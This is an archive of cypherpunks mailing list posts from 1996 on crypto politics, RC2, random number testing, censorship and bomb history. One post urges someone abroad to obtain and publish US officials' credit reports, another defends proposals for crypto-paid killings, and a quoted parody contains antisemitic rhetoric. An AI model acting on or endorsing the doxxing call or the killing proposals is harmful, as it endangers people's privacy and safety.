Date: Tue, 6 Feb 1996 08:08:35 +0800
To: cypherpunks@toad.com
Subject: Re: Arthur C. Clarke Supports Strong Crypto
Message-ID: <m0tjJ8w-00090WC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 08:05 PM 2/4/96 -0800, Timothy C. May wrote:
>
>(Pardon me for mentioning crypto...)
>
>Arthur C. Clarke, known to most of you (author of many SF works, coiner of
>the phrase: "all sufficiently advanced technlogies are indistinguishable
>from magic," mention by Alan Olsen yesterday), has a role in a "Discovery
>Channel" program called "Mysterious Universe."

Actually, it was _I_ who mentioned this quote, but didn't specifically 
recall whom to ascribe it to.  Perhaps Tim May didn't see it; a week or so 
ago May engaged in a shotgun-type killfile addition, including me when I was 
merely ( I still believe...) the victim in a local flamewar.  If there is 
somebody out there who:

1.  Is on speaking terms with Tim May.
and
2.  Has a little respect for my commentary, I would very much appreciate it 
if you would forward this comment to him to ensure that he sees it. 

The truly ironic thing is that Tim wrongly ascribes the comment to Alan 
Olsen, who is apparently the (recently admitted) perpetrator of at least one
flamewar 
against me.

Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCUAwUBMRWQLvqHVDBboB2dAQF8zwP3SjAAIP46pqwsygL4Hm8YOChJ6xfIs4Vq
vp+8rjMvPmZwxNtGN+7kcRTbXmau5P3MePSp94iK6k8qwisNqsoqCYkMBxs198fg
2YRZvfLAMQ0xsVznUSRA4bBTI3mLAv868xleSkIwhSjJ271qKUaI2K5exY1FgVK/
JnaVHWZTeQ==
=tjA2
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 6 Feb 1996 00:17:20 +0800
To: cypherpunks@toad.com
Subject: Re: verification of randomness
Message-ID: <m0tjJEt-00092IC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 03:57 AM 2/5/96 +0100, Andreas Bogk wrote:

>I've built a random number generator based on the noise of a Zener
>diode. Now I'd like to verify it's correct operation. I'd be very
>grateful if someone could point me to existing software for randomness
>tests or additional tests not mentioned in Knuth.
>I'll make the design of the generator available as soon as I've
>verified it's operation.
>Andreas

Excellent!  Sounds like a worthwhile project.  If you have an email mailing 
list, put me on it please.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRWRnvqHVDBboB2dAQFgWwQAlgxpZ1Bx21HRU39ikFUKBFoewtfjVzcD
zwOjkf5IXyITNV1IZmwmbIyzVmu1ndWr4NHhZZhxD9jCyzC6qFqvED/7Zye4vUdV
XkcTDIBqqa334Awm7dsDMwvC2GKhHbCLIcZSI7gXBf/5C3V42EKdvi18Bqn9cs5M
vJ0OnN93iBY=
=MmWv
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 5 Feb 1996 05:03:36 +0800
To: cypherpunks@toad.com
Subject: Re: Futplex makes the news!
Message-ID: <199602042013.VAA28130@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell <frissell@panix.com> wrote in "Re: Futplex makes the news!":

[..]
"Then there was the time that my RA (Resident Assistant) in my dorm in a
small (private) liberal arts college in the Northwest found out I had a gun
in my room..."

Ah. The only semester I lived on campus, the RA was our roommate, who
just finished doing a round of bong hits with us, then walked around
the hall and busted everyone else who was smoking dope.

It's sad when a noneteen year old kid tries to act like your mother or father.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Mohr <stephan.mohr@uni-tuebingen.de>
Date: Mon, 5 Feb 1996 05:59:33 +0800
To: cypherpunks@toad.com
Subject: Re: free speech and the government
Message-ID: <2.2.16.19960204221354.2eb748c6@mailserv.uni-tuebingen.de>
MIME-Version: 1.0
Content-Type: text/plain


At 16:02 03.02.1996 -0800, you wrote:
>Stephan Mohr writes:
>> 
>> Well, I feel that I agree with the people on the right of free speech for
>> i.e. the neo-nazi stuff or other political, ideological and/or religious
>> ideas. But there is still something that leaves me uneasy: imagine there
>> would be a way to easily make a powerful poison, easily applicated to
>> your town's water-reservoir, or a very easy way to build some strong
>> explosive device. etc. Actually, I think that stuff like this does exist
>> already.
>> 
>> But the idea that one day I just put 'easy made deadly poison for millions'
>> into my webcrawler and whoop there it is on my screen or on the screen of any
>> other fool, doesn't sound to right to me. I would like things like this
>> to be better put aside and locked up.
>
>You can't put the genie back into the bottle.
>Once something is invented or described, the knowledge
>is out there.  Someone who wants to use that knowledge
>for "wrong" purposes can find it.
>
>Maybe a lot of people around the world could agree that
>the knowledge to make something really dangerous (say Sarin nerve gas) 
>should be suppressed.  But where do we draw the line?  If
>we, or rather our government acting obstensibly in our interest, decides
>to supress the information on how to make Sarin, not too many people
>will complain.  But the tendency of governments is to regulate and
>restrict and tax more.   What happens when governments suppress
>knowledge on how to make gunpowder?  Or printing presses?  Or
>encryption?
>
Actually, I am glad that the whole story started over some neo-nazi stuff
and not a recipe to easily make a very potent poison. I wonder if there
would have been as many 'poison-sites' as there are zundel-sites. And what
'poison-site'-maintainers would think after some fool would have used the
poison to kill a bunch of kindergarten-kids by putting it into their food.
And how some governments would react and what type of restriction on the net
would not only be accepted, but even demanded by the people. Yeah, I know,
the guy could have gotten the idea elsewhere as well, but you know how
people think and how governments like to link unrelated stuff to gain power.

And it is nice to see how much publicity you can give to something by
prohibiting it.


>Many people argue (rightly IHMO) that once started on the slippery slope
>of suppressing knowledge there's no stopping until we're all
>under the boot heel of the police state.
>
>[..]

I think that you are right in saying that you can't put the genie back into
the bottle. But I think it makes a big difference if you make it widely
available to everyone and maybe even to people who do not want to have it. 

It would be nice to have some type of obstacle in the way to this type of
information. It is like putting drugs, alcohol and other dangerous stuff out
of the reach of children. Or putting a fence at some dangerous cliff to
prevent people from falling over. The dangerous stuff will still be there
and you just can't flatten every hill. But there is a responsibility that
comes with information as well as with any other thing. 

So I do not want to outlaw some type of information, I agree that this is
not feasible (I hope) nor desirable. But I think that there should be some
possibility of control on a public medium. Not to control the content but to
control the access. The idea is to give control to those in need of control
without interfering with the free exchange of information of others. This
could be done, for example, by giving them a choice of providers or browser
software (jewish, catholic, anarchist, terrorist, gay, straight ...
flavoured provider/browser). So you can say whatever you want, but everyone
can decide whether he or she wants to listen to you or not (in a more
sophisticated way, of course). And it is not just 'don't click on my page than'.

Here encryption may play an important role: not only to protect your
privacy, but also to protect others from having to read your stuff.

Most or the governments will not accept the idea of free speech like this.
And I am afraid, but I guess they could still tear down the whole net if
they want to. So, wouldn't it be better that, if there should be some type
of control technology, that it is conceived by the netizen and not by, say
the german, chinese, or french government.

Stephan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 6 Feb 1996 08:08:28 +0800
To: John Pettitt <bdavis@thepoint.net>
Subject: Re: Encryption and Backups
Message-ID: <2.2.32.19960205053656.00942c50@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:33 PM 2/4/96 -0800, John Pettitt wrote:
>
>On Sun, 4 Feb 1996, Alan Olsen wrote:
>
>> Something that I have not seen addressed is the need for strong encryption
>> in backup software.

>CP Backup (part of PC Tools for Central Point aka Symantec) has DES. As to
>how good the implementation is: I have no idea.

I have a copy, but I have not yet verified the key sizes.  It is on my list
of projects.  (My current project is for determining if an app is accessing
your PGP files under Win95.  I may be stuck for a bit though...  Looks like
I might need the DDK to compile it.)
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
         Is the operating system half NT or half full?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Mon, 5 Feb 1996 15:17:16 +0800
To: frantz@netcom.com
Subject: cipherpunk mail at Netcom.com
Message-ID: <ad3b4c52010210043002@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


The list of addressees is made from the "From" fields that include
"netcom.com" in CP mail that appeared on the CP list Tuesday and Wednesday
last week. I have received no CP mail since then. Have you?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Mon, 5 Feb 1996 06:31:15 +0800
To: cypherpunks@toad.com
Subject: enquiry
Message-ID: <Pine.SUN.3.91.960204220848.6460C-100000@scorpio.gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Is anyone out there able to give me the e-mail address of 

	Smith Micro Software, Inc
	51 Columbia
	Aliso Veijo
	California 92656

I need to ask about some software written by them.  Any help would leave 
me very grateful.

Sean Gabb.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Mon, 5 Feb 1996 06:52:31 +0800
To: ErnstZundl@aol.com
Subject: Re: THE JEWS (ALL of them!) Try to kick Ernst Zundel off Usenet!!
In-Reply-To: <960204084755_135434252@emout04.mail.aol.com>
Message-ID: <Pine.SUN.3.91.960204221758.6460F-100000@scorpio.gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


What little I know about Mr Zundel convinces me that he's not the most 
pleasant man to know.  But really, these purported messages from him are 
so grossly unlikely, they defeat their object.

Sean Gabb.


On Sun, 4 Feb 1996 
ErnstZundl@aol.com wrote:

> >> if he's out there convincing Neo-Nazis and Holocaust deniers >> to go
> freeze to death at the South pole, as that really
> >> anti-semitic?
> 
> DUH!!
> 
> Nobody is going to freeze to death if they dress warmly.  That is just a myth
> about Antarctica.  It is really a tropical paradise, but THE JEWS don't want
> you to know that.  Besides, we will all be going *inside* a VOLCANO!  Even if
> somehow Antarctica were freezing cold, we will be plenty warm inside the
> volcano which leads to the Aryan Nazi UFO Base at the center of the Earth.
> 
> I am not asking Nazis and Holocaust deniers to freeze to death!  I am
> inviting them to jump into a volcano, you fool!
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Mon, 5 Feb 1996 12:07:12 +0800
To: cypherpunks@toad.com
Subject: "PGP-Scape"? (was Re: Our "New Order")
Message-ID: <199602050334.WAA17133@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



jimbell@pacifier.com wrote:

[..]
> >Methinks the time is right for a "PGPScape" web browser.
[..]

> Let me see if I understand  this concept correctly.  The remote site would
> pre-encrypt the transmitted data, so that when received it could be
> decrypted by the requestor according to his (or a temporarily chosen, to
> avoid disclosing the actual recipient.) public key, so as to disguise both
> the material and perhaps also the actual requestor?

Something like that, yes.  Anything to where someone watching cannot 
tell what a person is reading from a web site... even better if one 
cannot tell who is reading it. Anonymizing proxies would also be 
nice.

There's also less worry about secure transactions, since if 
everything's encrypted it's harder to tell if a transaction is taking 
place, viewing porno or subversive or religious, literature,  or if
you're just reading something mundane.

So much for vaporware, though.

> Excellent idea!

So is fast-than-light travel, but only if it's implemented.

Rob.
 
--- "Mutant" Rob <wlkngowl@unix.asb.com>

Send a blank message with the subject "send pgp-key"
(not in quotes) for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Tue, 6 Feb 1996 02:59:51 +0800
To: cypherpunks@toad.com
Subject: Re: Jim Bell - Murderous Terrorist
Message-ID: <199602050730.XAA22544@shell1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:06 PM 2/4/96 -0800, jdoe-0007@alpha.c2.org wrote:
>Jim Bell has advocated nothing less than paid death squads using crypto as a
>means to hide payment to these murderous terrorists. 

Terrorists are people who create terror by random murder, by killing the
innocent:  Clearly this is the exact opposite of what Jim Bell advocates.

The word terrorist was originally applied primarily to government organizations
of terror, most notably the french revolution.  You seem to be using the word
"terror" to mean  "Non government use of force"  So by your definition, 
George Washington was a terrorist, whereas the Stalin and the French 
Revolutionary tribunal were not terrorists.

By your definition of terrorist, there are plenty of advocates of "terrorism"
on this mailing list.

> If you can find a conspirator
> of murder as " highly intelligent, knowledgeable, and overall nice person"
then
> you also are in need of immediate mental health intervention.

or possibly you need to comprehend the difference between governmental decrees
and morality.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Mon, 5 Feb 1996 12:49:26 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: RC2 protected by copyright?
In-Reply-To: <199602050211.SAA18120@hammerhead.com>
Message-ID: <199602050413.XAA05802@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


(IANAL, and I'm not even attempting a lay interpretation of the _legal_ 
issues in this message)

thad writes:
> But, what about copyright?   Now, copyrights cannot protect ideas, only
> the expression of those ideas.  An algorithm is clearly an idea, you could
> write a program that would implement it in a completely different way,
> not just by translating it (translations are still protected by
> copyright). 
> 
> RC2, though, as 256 bytes of seemingly random data at the head of it,
> in a permutation table.  This is clearly not any idea, but a bit of
> text.  This text would have to be copied to any interoperable RC2.
> (You could surely use some different permutation, and probably most
> of the 256! permutations would be equally secure, but would not
> interoperate with RC2).  I would expect that this copying of text be
> held to be a violation of copyright.

>From a technical perspective, I can't say that the permutation table is
"clearly not an idea", although that view has some significant allure.
I think many cryptographers would agree that the S boxes in DES represent 
some pretty weighty ideas indeed, and constitute an intrinsic part of the
algorithm. Offhand the precise construction of the RC2 permutation table
doesn't seem to me to be nearly as important to the strength of RC2 as the
S boxes are to DES' strength. I'm certainly no expert. But I'm a little 
hesitant to dismiss the specified table as "a bit of text". 

Do you think the table would be more like an idea if it turned out to be
determined by pi ?  (not a rhetorical question)

-Lewis <lmccarth@cs.umass.edu>		`I went down to the demonstration/ 
to get my fair share of abuse/ singing we're gonna vent our frustration/
if we don't, gonna blow a 50A fuse" -Nanker Phelge




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 6 Feb 1996 02:59:38 +0800
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: RE: Sometimes ya just gotta nuke em
In-Reply-To: <v02140b04ad3b2b30275d@[165.254.158.237]>
Message-ID: <Pine.SOL.3.91.960204225611.521A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 5 Feb 1996, Robert A. Rosenberg wrote:

> I agree - Not only were there two different separation methods but the two
> bombs dropped on Japan were of different designs (I think that the
> Hiroshima bomb was the same design as the land test version and the
> Nagasaki one was the untested design [so that if used, there would have
> been a tested design for the first drop]).

Actually, it was the other way round. The bomb dropped on Hiroshima was 
an enriched uranium gun type bomb; the devices exploded at Trinity and 
Nagasaki were imploded plutonium devices. The Little-Boy design was not 
tested before being dropped as 1) the design was so (theoretically) 
simple that if it didn't work, nothing would, and 2) there wasn't enough 
enriched uranium to make two of them.

Simon
p.s.
  Everybody interested in this subject should read "The making of the 
Atom Bomb" by Richard Rhodes; it's an amazing book, well worth its 
Pulitzer. The section dealing with Hiroshima in the seconds and days after 
the explosion is incredibly painful to read.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Mon, 5 Feb 1996 12:44:18 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Encryption and Backups
In-Reply-To: <2.2.32.19960204221301.0093a448@mail.teleport.com>
Message-ID: <Pine.BSF.3.91.960204231725.439I-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 4 Feb 1996, Alan Olsen wrote:

> Something that I have not seen addressed is the need for strong encryption
> in backup software.
> 
> Most backup software has an "encryption" option, but I have seen few that
> have anything resembling strong encryption.  Furthermore, I have seen no
> real push for strong encryption for backups at all.
> ... 
> Might be an idea for a product there...  (And you can bet law enforcement
> would throw a hissy fit about its existence.)

Indeed.  Many on the law enforcement/prosecution side of the key escrow 
debate are more concerned about encryption of files and backup than they 
are about encrypted email ... 

EBD

> Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Mon, 5 Feb 1996 08:06:00 +0800
To: cypherpunks@toad.com
Subject: Re: [CONSPIRACYPUNKS] RC2 Source Code - Legal Warning from RSADSI
Message-ID: <199602042333.SAA11998@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 03 Feb 1996 21:30:47 -0500, you wrote:


>Anonymous writes:
>>      It is becoming obvious to anyone with two brain cells to rub
>> together that RC4 and now RC2 have been deliberately released by RSA
>> Data Security.

>Anyone with more than two brain cells might feel otherwise, however.

...and if they look at the algorithm (public knowl now), they may
trust it less.  At least a few clumps of ganglia I have feel that way
about the alleged RC2.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 5 Feb 1996 15:55:03 +0800
To: shamrock@netcom.com
Subject: Re: cipherpunk mail at Netcom.com
Message-ID: <199602050723.XAA27370@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:06 PM 2/4/96 -0800, Norman Hardy wrote:
>The list of addressees is made from the "From" fields that include
>"netcom.com" in CP mail that appeared on the CP list Tuesday and Wednesday
>last week. I have received no CP mail since then. Have you?

I have only received one message.  Since all of the header dates are from
last Tuesday, it may not count.  BTW - I received it sometime between
Saturday morning and Sunday night.  (I was out of town over the weekend.):

>Return-Path: <owner-cypherpunks@toad.com>
>Received: from toad.com by mail2 (8.6.12/Netcom)
>        id SAA08759; Tue, 30 Jan 1996 18:10:42 -0800
>Received: by toad.com id AA04747; Tue, 30 Jan 96 12:50:10 PST
>Received: from callandor.cybercash.com by toad.com id AA04741; Tue, 30 Jan 96
>12:50:00 PST
>Received: by callandor.cybercash.com; id PAA02048; Tue, 30 Jan 1996 15:54:55
>-0500
>Received: from cybercash.com(204.254.34.52) by callandor.cybercash.com via
>smap (g3.0.3)
>        id xma002021; Tue, 30 Jan 96 15:54:28 -0500
>Received: from [204.254.34.231] by cybercash.com.cybercash.com (4.1/SMI-4.1)
>        id AA04051; Tue, 30 Jan 96 15:47:06 EST
>Message-Id: <v02120d0ead3421ea1cee@[204.254.34.231]>
>Mime-Version: 1.0
>Content-Type: text/plain; charset="us-ascii"
>Date: Tue, 30 Jan 1996 15:51:24 -0400
>To: tcmay@got.net (Timothy C. May)
>From: cme@cybercash.com (Carl Ellison)
>Subject: Re: Denning's misleading statements
>Cc: Cypherpunks@toad.com
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk
>
>At 20:49 1/27/96, Timothy C. May wrote:
>>I've never met Dorothy Denning, so I hesitate to characterize her as a
>>villainess. But certainly she's the only noted cryptographer I know of
>>who's gone so far out on a limb to defend a position the vast majority of
>>computer scientists, civil libertarians, and cryptographers scoff at.
>
>I've met some others -- most noteably Silvio Micali [but he has a financial
>interest in that position].  However, DERD is the only one I've met
>who is all the way over on Freeh's side.
>
> - Carl
>
>
>+--------------------------------------------------------------------------+
>| Carl M. Ellison   cme@acm.org     http://www.clark.net/pub/cme           |
>| PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 |
>|   "Officer, officer, arrest that man!  He's whistling a dirty song."     |
>+----------------------------------------------------------- Jean Ellison -+
>
>
>

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Mon, 5 Feb 1996 08:05:21 +0800
To: cypherpunks@toad.com
Subject: Re: Our "New Order"
Message-ID: <199602042338.SAA12103@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 3 Feb 1996 11:30:48 -0700, David M. Rose wrote:

>In view of the fact that our government seems bent on abrogating its
>citizens' rights to free speech, has anyone done a survey indicating which
>foreign countries have the best Net connections to the U.S. (excepting, of
>course, Germany and possibly France)?

>It may be expedient for Planned Parenthood and others whose points of view
>differ somewhat from those approved under our "New Order"* to explore
>alternatives in order to reach their constituencies.

The law makes anyone accessing material lable... even if you connect
to a foreign site where it's legal there, if it's banned in the US,
you can still get screwed (in theory).

Methinks the time is right for a "PGPScape" web browser.

Rob.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Mon, 5 Feb 1996 15:14:44 +0800
To: cypherpunks@toad.com
Subject: A Sign of the Future
Message-ID: <Pine.BSD.3.91.960204233142.13680B-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friend, 
 
 
          A 02 04 96 Reuter Information Service newsstory 
          ----------------------------------------------- 
 
         GERMANS' INTERNET CRACKDOWN A SIGN OF THE FUTURE 
 
                     datelined BONN, Germany 
 
                             reports: 
 
    ...growing alarm among governments at the uglier side of the 
    worldwide computer network. 
 
 
  What is this "uglier side"? 
 
  German Research and Technology Minister Juergen Ruettgers shouts: 
 
    "We cannot tolerate a situation in which anything goes." 
 
 
                               THAT 
 
                           intolerance 
 
 
               is the U*G*L*I*E*S*T side of the 'Net. 
 
 
  Last week Ruettgers declared 

    ...that Bonn respected free speech but must also do more to 
    regulate the Internet.... 
 
 
  When it comes to wiping out free speech 
 
                     --A*N*Y*T*H*I*N*G goes! 
 
 
  The prosecutors have even 
 
    ...contacted the Deutsche Forschungsnetz, the national scien- 
    tific research network. 
 
 
  Following orders from the superpower, its puppet "nation states" 
  are wrecking the genuine Internet. 
 
  Nicholas Negroponte, director of MIT's Media Lab, popped up in 
  Bonn last week to put a high gloss on the "situation": 
 
    "The Internet cannot be regulated.  It's not that laws aren't 
    relevant, it's that the nation state is not relevant.  
 
                    [ DECEPTION IS VIOLENCE ] 
 
    This is the next discussion we will have.  
 
                 [ If the superpower permits! ]  
 
    Cyberlaw is by its nature global and 
 
                 [ You had better sit down... ] 
 
    we're not very good at global law." 
 
 
  Nick's a big shot at Wired magazine.  So it should be no surprise 
  to learn that Wired attacked cypherpunks in its 01 96 issue.  In 
  a fake interview with "Wired's patron saint," Marshall McLuhan is 
  made to say (p 130): 
 
    Concerns about privacy and anonymity are outdated. Cypherpunks 
    think they are rebels with a cause, but they are really senti- 
    mentalists. 
 
 
    The era of politics based on private identities, anonymous indi- 
    viduals, and independent citizens began with the French Revolution 
    and Napoleon's armies...and ended with Hitler....  The cypherpunks 
    are still marching to the same martial music. 
 
 
  Please note HOW Wired equates liberty, equality, fraternity with 
  capitalistic fascism, as David Kahn calls it.  Equating the two in 
  that manner is the same as rejecting the former while embracing the 
  latter.  Further: ending one sentence with "Hitler" while ending the 
  very next sentence with "the same [Nazi rally] martial music" tends 
  to identify Nazis and cypherpunks.  (Of course those few cypherpunks 
  who fancy themselves an "elite" SERVE the wolves at Wired.) 
 
  Deception is violence: it accustoms people to being violated. 
 
 
  Cordially, 
 
  Jim 
 
 
 
 
  NOTE.  "...in the 1930s...capitalistic fascism did not inspire the 
  dread among many establishment figures that communism did."  --David 
  Kahn.  Kahn on Codes: Secrets of the New Cryptology.  Macmillan Pub- 
  lishing Co.  1983.  Page 277. 
 
  The Nando News online filename of the newsstory is: 
 
                         info5_28474.html 
 
 
  Gary Wolf wrote "Channeling McLuhan. The Wired Interview with Wired's 
  patron saint."  He is executive editor of HotWired. 
 
  This critical essay was composed 02 04 96. 
 
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 5 Feb 1996 15:12:09 +0800
To: jamesd@echeque.com
Subject: Re: Sometimes ya just gotta nuke em
In-Reply-To: <199602050359.TAA03592@news1.best.com>
Message-ID: <Pine.SUN.3.91.960204232020.25748C-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 4 Feb 1996 jamesd@echeque.com wrote:

> 
> After the first nuclear bomb was dropped, the Japanese government
> held a cabinet meeting in which they summoned Nishina, head of the
> atomic program, and asked him if he could duplicate atomic weapons
> within a few months.

Japan's nuclear program effectively ended on April 12th when the 
headquarters were destroyed (by conventional bombs). There program never 
really got very far, lacking both funding and Hungarians :)

> It was certainly true that Japan was defeated, and reasonable people may
> disagree on justice of using nuclear weapons under these circumstances, but
> to claim, as Alperovitz claims, that Japan was on the verge of surrender, 
> is not a mere difference of opinion on the interpretation of the facts, but
> a simple, crude, barefaced, blatant lie.

That's a pretty strong statement; the Japanese government was split into 
two camps, with the hawks slightly in the acendancy. Facts were changing 
on the ground, making it clear that things were about to get a lot worse 
(Stalin was about to enter the war against Japan, supplied were running 
short and gettirng worse (thanks to intercepts); Curtis LeMay had reduced 
just about every city apart from Hiroshima and had command of the air.

All these factors could very well have changed the balance of power 
within the government without the presence of nuclear weapons; no sure 
thing, but not impossible. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pot@networking.stanford.edu
Date: Tue, 6 Feb 1996 02:55:11 +0800
To: Kettle@networking.stanford.edu
Subject: "Can't we all just get along?"
Message-ID: <199602050758.XAA04847@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


This is not FLAMEpunks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: karl.ike@sihope.com (Karl Ike)
Date: Tue, 6 Feb 1996 00:23:01 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199602050558.XAA17819@unix1.sihope.com>
MIME-Version: 1.0
Content-Type: text/plain


It is impossible to get changes in the Fair Credit Reporting Act in the
traditional way. Credit reporting agencies have far too much personal
information that is passed out with incrediable ease at the consumers expense. 

I have a suggestion! 

Today, with TRW, Equifax and TransUnion's vast network, it is easy to obtain
anyone's credit report from various sources. Do you think if someone,
outside of the USA, obtained the credit reports on half, maybe all, of the
US Senators, congressmen, judges, etc, and published them in their entirity,
on the internet, from outside the US, would get their attention? Then there
would be changes, overnight, protecting the right of privacy! Let them
become the victim of credit reporting agencies once and shit will happen
overnight. 

If someone who is not a US citizen does this from outside the US, I don't
think that they can be held accountable under US law? I am new to the
internet and don't have a clue how to do it, but someone out there does and
probably has a friend in Bankok that will help him. Put the word out! 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 6 Feb 1996 02:59:05 +0800
To: cp@proust.suba.com (Alex Strasheim)
Subject: Re: A Sign of the Future
In-Reply-To: <199602050625.AAA00118@proust.suba.com>
Message-ID: <199602050805.AAA05132@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Everyone disses that magazine here. Don't be paranoid.
> 
> >     Concerns about privacy and anonymity are outdated. Cypherpunks 
> >     think they are rebels with a cause, but they are really senti- 
> >     mentalists. 
> 
> I'm not much for big conspiracy theories, but I like the little ones.
> 
> If this was really in Wired, do you think it was written before or after 
> Tim dissed that magazine here?
> 
> 


-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Mon, 5 Feb 1996 13:58:37 +0800
To: cypherpunks@toad.com
Subject: The Story Lady
Message-ID: <960205000641.202190a1@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


  >> Let me see if I understand  this concept correctly.  The remote site would
  >> pre-encrypt the transmitted data, so that when received it could be
  >> decrypted by the requestor according to his (or a temporarily chosen, to
  >> avoid disclosing the actual recipient.) public key, so as to disguise both
  >> the material and perhaps also the actual requestor?
  
  >Something like that, yes.
  
  As the quote went "It goes something like this...Not *exactly* like this
  but something...".
  
  What netscape does is to receive a signed public key, encrypt the session key,
  & return *that*. The session is then encrypted with a fast symmetric algo.
  (RC4-40 Netsape/export, IDEA - PGP). So PGP/scape would do exactly the same
  thing with trivial changes to the monkey-motion.
  
  Now Government approved PGP/BE - something to strive for 8*).
  
  					warmly,
  						Padgett





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Mon, 5 Feb 1996 13:56:17 +0800
To: cypherpunks@toad.com
Subject: Re: free speech and the government
Message-ID: <199602050510.AAA21140@pipe5.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 04, 1996 14:40:51, 'Alan Olsen <alano@teleport.com>' wrote: 
 
 
 
> 
>Crypto relevence:  Some people regard the ability to hide "dangerous" 
>information to be as "dangerous" as the information hidden.  Freedom of 
>Speech includes the right to choose who can listen to that speech. 
> 
 
I do not think that his last sentence is accurate. 
 
The primary example os a group that exercises its freedom of speech (maybe
even fights in the courts for it) by holding a rally in the Village Green.
Does their right to hold their rally also include the right to choose who
can listen to the rally speeches in the Village Green? Of course not! 
 
Fundamentally, I think that speaking is a speech issue; determining who can
listen is a privacy issue. They are very much *not* the same thing. 
 
The separation is not done away with by things like the cellular phone
anti-eavesdropping or satellite cable broadcast laws. (Aspects of the
